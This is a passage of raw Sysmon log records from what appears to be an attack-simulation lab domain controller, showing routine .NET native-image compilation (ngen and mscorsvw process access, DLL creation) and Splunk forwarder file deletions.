ramework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:00.945{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b88-0\Microsoft.NetworkController.SDNDiagnosticsTask.dll2021-06-23 21:04:00.945 10341000x800000000000000020505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.852{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.820{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.820{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.774{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6FF7E92E4733BAA7C88076A4BCFAF2F6,SHA256=B89E791431466300B12A94845FB894EFF700361C0DE52EEC8CAFFC173A46D491,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.711{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8A03-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.695{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8A03-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.695{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8A03-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:00.649{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14dc-0\Microsoft.ManagementConsole.dll2021-06-23 21:04:00.649 10341000x800000000000000020497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.367{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.352{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.352{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.305{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D76777A0F3106F3F654D90DC0433253D,SHA256=1E3151D9A1B48D0C00D57E586B7BAC6006A844AEACBD5442D9A180EF830CFC55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.180{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8803-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.164{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8803-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.149{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8803-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:00.039{4DB9351A-A1BE-60D3-8603-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13b8-0\Microsoft.Management.UI.dll2021-06-23 21:04:00.039 23542300x800000000000000020514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.852{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64B9A2E1FA312A80E836A7873E55C011,SHA256=EEBB136104542BC1231207A2D4839A47011C0E9A026EA6000F510AA2AD70BBC6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.320{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.320{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.320{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C6D8ECCE6779070A63E6624F356957,SHA256=A7E1B288E451DF966BF1DD7836D9B18C19D30A0F063C597583A2A8EB917668AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.008{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8C03-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.945{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C2-60D3-9003-00000000CF01}3020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.914{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C2-60D3-9003-00000000CF01}3020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.914{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C2-60D3-9003-00000000CF01}3020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:02.883{4DB9351A-A1C2-60D3-8F03-00000000CF01}6452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1934-0\Microsoft.PowerShell.Cmdletization.OData.dll2021-06-23 21:04:02.883 10341000x800000000000000020523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.742{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C2-60D3-8F03-00000000CF01}6452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 